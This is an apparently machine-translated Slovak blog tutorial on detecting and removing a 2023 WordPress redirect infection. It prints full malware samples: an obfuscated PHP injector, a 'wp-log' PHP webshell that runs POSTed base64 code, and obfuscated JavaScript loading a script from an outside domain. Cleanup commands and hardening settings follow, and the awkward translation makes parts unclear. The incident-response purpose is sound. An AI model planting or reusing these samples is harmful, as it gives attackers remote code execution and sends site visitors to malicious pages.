Oprava presmerovania WordPress Hack 2023 (presmerovanie vírusu)

WordPress je určite najpoužívanejšia platforma CMS (Content Management System) Pre obidva blogy a online štartérové obchody (s modulom WooCommerce), vďaka čomu je najviac zameraný na počítačové útoky (hacking). Cieľom jednej z najpoužívanejších hackerských operácií je presmerovať ohrozenú webovú stránku na iné webové stránky. Redirect WordPress Hack 2023 je relatívne nový škodlivý softvér, ktorý má vplyv na presmerovanie celého webu na spamové webové stránky alebo ktoré môžu zase vírusové počítače používateľov.

spokojnosť

Ak je vaša stránka vyvinutá na WordPress presmerovaná na inom webe, obeť je už slávnym presmerovaním hack.

V tomto návode nájdete potrebné informácie a užitočné tipy, prostredníctvom ktorých môžete prepustiť webovú stránku infikovanú presmerovaním WordPress Hack (Virus Redirect). Prostredníctvom komentárov môžete získať ďalšie informácie alebo požiadať o pomoc.

Detekcia vírusu, ktorý presmeruje stránky WordPress

Náhle a neopodstatnené zníženie prenosu na webe, zníženie počtu objednávok (v prípade internetových obchodov) alebo reklamných príjmov sú prvými znakmi, že niečo nie je v poriadku. Zisťovanie “Redirect WordPress Hack 2023” (Vírus presmerovania) je možné vykonať a “vizuálny” Pri otvorení webovej stránky a ste presmerovaní na inú webovú stránku.

Zo skúseností je väčšina aplikácií na škodlivý softvér z webového softvéru kompatibilná s internetovými prehliadačmi: Chrome, Firefox, Edge, Opera. Ak ste používateľom počítača Mac, tieto vírusy nie sú v prehliadači Safari veľmi viditeľné. Bezpečnostný systém Safari ticho blokuje tieto škodlivé skripty.

Čo musíte urobiť, ak máte webovú stránku vírusu WordPress Hack Word Hack

Dúfam, že prvým opatrením nie je panikáriť ani vymazať webovú stránku. V prvej fáze by sa nemali odstrániť ani vírusové alebo vírusové súbory. Obsahujú cenné informácie, ktoré vám môžu pomôcť pochopiť, kde je porušenie bezpečnosti a čo ovplyvnil vírus. MODUS Operandi.

Zatvorte webovú stránku pre verejnosť.

Ako zatvoríte vírusovú webovú stránku pre návštevníkov? Najjednoduchšie je použiť správcu DNS a odstrániť jeho IP “A” (názov domény) alebo definujte neexistujúcu IP. Návštevníci tejto webovej stránky budú teda chránení pred týmto presmerovaním hacku WordPress, ktorý ich môže vziať na webové stránky vírusu alebo spamu.

Ak používate CloudFlare Ako manažér DNS overíte vo svojom účte a vymažete záznamy DNS “A” Pre názov domény. Oblasť ovplyvnená vírusom zostane bez IP, nie je možné získať prístup z internetu.

Skopírovať IP webovej stránky a urobiť “cesta” Ak chcete mať prístup iba k vám. Z vášho počítača.

Ako zmeníte skutočnú IP webovej stránky na počítačoch Windows?

Táto metóda sa často používa na blokovanie prístupu na určité webové stránky úpravou súboru “hostiteľ”.

1. Otvorte poznámkový blok alebo iný textový editor (s právami administrátora) a upravte súbor “hosts“. Nachádza sa v:

C:\Windows\System32\drivers\etc\hosts

2. V súbore “hostiteľ” pridať “cesta” na skutočnú IP na vašom webe. IP vymazané vyššie z DNS Manager.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Uložte súbor a prístup na webovú stránku v prehliadači.

Ak sa webová stránka neotvára a v súbore ste neurobili chybu “hostiteľ”, s najväčšou pravdepodobnosťou je vyrovnávacia pamäť DNS.

Ak chcete odstrániť vyrovnávaciu pamäť DNS v operačnom systéme Windows, otvorte príkazový riadok, kde vykonáte objednávku:

ipconfig /flushdns

Ako zmeníte skutočnú IP webovej stránky na počítačoch Mac / MacBook?

Pre používateľov počítačov Mac je to trochu ľahšie zmeniť skutočnú IP webovej stránky.

1. Otvorte nástroj Terminal.

2. Vykonajte príkazový riadok (vyžaduje systémové heslo na vykonanie):

sudo nano /etc/hosts

3. Pokiaľ ide o počítače Windows, pridajte skutočnú IP domény.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Uložte zmeny. Ctrl+X (y).

Potom, čo ste to urobili “cesta”, ste jediný človek, ktorý má prístup k webovej stránke vírusu Wordpress Hack Word Hack.

Plná záložná webová stránka – Súbory a databáza

Aj keď je to vírus s “presmerovanie hack WordPress”, odporúčanie je urobiť všeobecné zálohovanie celej webovej stránky. Súbory a databáza. Možno by ste mohli uložiť lokálnu kópiu oboch súborov v public / public_html ako aj databáza.

Identifikácia vírusu a modifikovaných súborov presmerovania WordPress Hack 2023

Hlavné cieľové súbory WordPress Som index.php (pri koreni), header.php, index.php a footer.php aktívnej témy WordPress. Ručne skontrolujte tieto súbory a identifikujte malcidový kód alebo skript škodlivého softvéru.

V roku 2023 vírus typu “Presmerovanie hack WordPress” vložiť index.php Kód formulára:

(Neodporúčam vám vykonať tieto kódy!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Dekódované, toto škodlivý softvér Prakticky je to dôsledok webovej stránky WordPress. Nie je to skript, ktorý je základom aplikácie škodlivého softvéru, ale je to skript, ktorý umožňuje presmerovanie webovej stránky vírusu. Ak dekódujeme vyššie uvedený skript, dostaneme:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Oprava presmerovania WordPress hack 2023

Na označenie všetkých súborov na serveri obsahujúcom tento kód je dobré mať prístup SSH na server spustenie súborov šekov a administratívy v systéme Linux.

Súvisiace: Ako zistíte, či máte blog s vírusom alebo nie, pomocou vyhľadávania Google. (Vírus WordPress)

Nižšie sú uvedené dva príkazy, ktoré sú určite užitočné pri identifikácii nedávno upravených súborov a súborov obsahujúcich konkrétny kód (reťazec).

Ako vidíte modifikované súbory PHP za posledných 24 hodín alebo v inom časovom rozpätí v Linuxe?

Príkaz “find” Používanie je veľmi jednoduché a umožňuje personalizáciu nastaviť časové obdobie, opravu, v ktorej sa vyhľadávanie a typ súborov pripravuje.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

Vo výstupe dostanete informácie o dátume a čase, keď bol súbor upravený, písanie / čítanie / vykonávanie povolení (chmod) a ktorej skupina / používateľ patrí.

Ak chcete skontrolovať pred niekoľkými dňami, zmeňte hodnotu “-mtime -1” alebo použiť “-mmin -360” na minúty (6 hodín).

Ako hľadáte kód (reťazec) vo vnútri súborov PHP, Java?

Príkazový riadok “zistiť” cez ktoré môžete rýchlo nájsť všetky súbory PHP alebo Java obsahujúce konkrétny kód, je nasledovne:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Objednávka bude vyhľadávať a zobrazovať súbory .php a .js obsahujúci “uJjBRODYsU“.

Pomocou dvoch vyššie uvedených dvoch objednávok nájdete veľmi ľahko, ktoré súbory boli v poslednej dobe upravené a obsahujú kód škodlivého softvéru.

Odstraňuje škodlivý softvér z upravených súborov bez ohrozenia správneho kódu. V mojom scenári bol kód škodlivého softvéru umiestnený pred otvorením <head>.

Pri vykonávaní prvého poriadku “zistiť” Na serveri je veľmi možné objaviť nové súbory, ktoré tam nie sú WordPress alebo tam. Súbory, ktoré ohlasujú vírus WordPress Hack presmerovanie.

V scenári, ktorý som vyšetril, sa súbory formulára objavili na serveri “wp-log-nOXdgD.php“. Toto sú súbory “tvorba” ktorý tiež obsahuje kód škodlivého softvéru používaný vírusom presmerovania.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Účel typu súborov “wp-log-*” Je to šírenie vírusu presmerovania hack a ďalšie webové stránky hostené na serveri. Je typ malware kódu “webshell” zložené z jedného základná časť (v ktorom sú definované niektoré šifrované premenné) a o vykonávacia časť čím sa útočník pokúša načítať a vykonať kód škodlivého softvéru v systéme.

Ak existuje premenná POST nazývaný ‘bh‘ a jeho šifrovaná hodnota MD5 sa rovná “8f1f964a4b4d8d1ac3f0386693d28d03“, potom sa zdá, že skript napíše šifrovaný obsah base64 inej premennej nazývanej ‘b3‘ V dočasnom súbore a potom skúste zahrnúť tento dočasný súbor.

Ak existuje premenná POST alebo GET nazývaný ‘tick„Skript bude reagovať hodnotou MD5 reťazec “885“.

Ak chcete identifikovať všetky súbory na serveri obsahujúcom tento kód, vyberte bežný reťazec a potom vykonajte príkaz “find” (podobné vyššie uvedenému). Odstrániť všetky súbory obsahujúce tento kód škodlivého softvéru.

Porušenie bezpečnosti prevádzkované presmerovaním hack WordPress

S najväčšou pravdepodobnosťou tento presmerovaný vírus siaha cez Využívanie používateľa WordPress Administration alebo identifikáciou a zraniteľný doplnok čo umožňuje pridávanie používateľov s privilégiámi správcu.

Pre väčšinu webových stránok je možná platforma WordPress Úpravy tém tém alebo doplnkovdo administratívneho rozhrania (Dashboard). Škodlivý človek teda môže pridať do súborov škodlivého softvéru témy, ktorý generuje vyššie uvedené skripty.

Príkladom takéhoto škodlivého softvéru je tento:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript Identifikované v hlavičke témy WordPress, okamžite po otvorení štítku <head>.

Je dosť ťažké dešifrovať tento javascript, je však zrejmé, že iná webová adresa s najväčšou pravdepodobnosťou prinesie ďalšie skripty na vytvorenie súborov “wp-log-*” o ktorých som hovoril vyššie.

Vyhľadajte a odstráňte tento kód zo všetkých súborov PHP postihnuté.

Pokiaľ som mohol zistiť, že tento kód bol manuálne pridaný od nového používateľa s administratívnymi oprávneniami.

Aby sa zabránilo pridaniu škodlivého softvéru do prístroja, je najlepšie zakázať WordPress / Plugins v prístrojovej doske.

Upraviť súbor wp-config.php a pridajte riadky:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Po vykonaní tejto zmeny žiadny používateľ WordPress nebude môcť upravovať súbory na prístrojovej doske.

Skontrolujte používateľov s úlohou administrátora

Nižšie je uvedený dotaz SQL, ktorý môžete použiť na vyhľadávanie používateľov s správcom na platforme WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Tento dotaz vráti všetkých používateľov v tabuľke wp_users ktorý pripisoval úlohu administrátora. Dotaz sa vykonáva pre stôl wp_usermeta hľadať v meta ‘wp_capabilities', Ktorý obsahuje informácie o úlohách používateľov.

Ďalšou metódou je ich identifikácia z: Dashboard → Users → All Users → Administrator. Ale cvičím používateľa, ktorý sa dá skryť na paneli Dashboard. Takže najlepší spôsob, ako vidieť používateľov “Správca” WordPress je príkaz SQL vyššie.

V mojom prípade som v databáze identifikoval používateľa s názvom “wp-import-user“. Celkom sugestívne.

Odtiaľ vidíte dátum a čas, keď bol vytvorený používateľ WordPress. Používateľ používateľa je tiež veľmi dôležitý, pretože sa pozeral v protokoloch servera. Týmto spôsobom môžete vidieť všetku aktivitu tohto používateľa.

Odstrániť používateľov s úlohou administrátora že teda nevieš, potom Zmeňte svoje heslá všetkým administratívnym používateľom. Editor, autor, administrátor.

Zmeňte heslo používateľa SQL do databázy postihnutej webovej stránky.

Po podniknutí týchto krokov je možné webovú stránku reštartovať pre všetkých používateľov.

Všimnite si však, že to, čo som uviedol vyššie, je jedným z tisícov pľuvania, pomocou ktorých je webová stránka s presmerovaním hack WordPress v roku 2023.

Ak bol váš web vírusom a potrebujete pomoc alebo ak máte akékoľvek obavy, je okolie komentárov otvorené.